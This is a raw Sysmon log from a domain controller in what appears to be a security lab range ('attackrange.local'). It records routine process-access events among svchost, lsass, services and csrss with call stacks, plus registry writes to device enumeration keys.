13:53:05.227{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000948Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.227{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000947Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.227{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000946Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.227{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000945Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.227{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000944Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.227{10ACEC4A-853E-5FCF-0B00-000000009101}8641112C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000943Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.227{10ACEC4A-853E-5FCF-0B00-000000009101}8641112C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000942Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.211{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000941Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.211{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000940Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.211{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000939Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.211{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000938Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.211{10ACEC4A-853E-5FCF-0B00-000000009101}8641112C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000937Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.211{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000936Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.211{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000935Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.211{10ACEC4A-853E-5FCF-0B00-000000009101}8641112C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000934Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.211{10ACEC4A-853E-5FCF-0A00-000000009101}852944C:\Windows\system32\services.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000933Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.211{10ACEC4A-853E-5FCF-0A00-000000009101}852948C:\Windows\system32\services.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000932Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.211{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000931Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.196{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\NextInstanceDWORD (0x0000001f) 13241300x8000000000000000930Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.196{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\CountDWORD (0x0000001f) 13241300x8000000000000000929Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.196{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\30UMB\UMB\1&841921d&0&TERMINPUT_BUS 13241300x8000000000000000928Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.196{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\NextInstanceDWORD (0x00000002) 13241300x8000000000000000927Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.196{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\CountDWORD (0x00000002) 13241300x8000000000000000926Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.196{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\1UMB\UMB\1&841921d&0&TERMINPUT_BUS 10341000x8000000000000000925Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.196{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000924Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.196{10ACEC4A-853E-5FCF-0A00-000000009101}8521136C:\Windows\system32\services.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+52f1|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000923Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.196{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000922Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.196{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000921Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.196{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000920Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 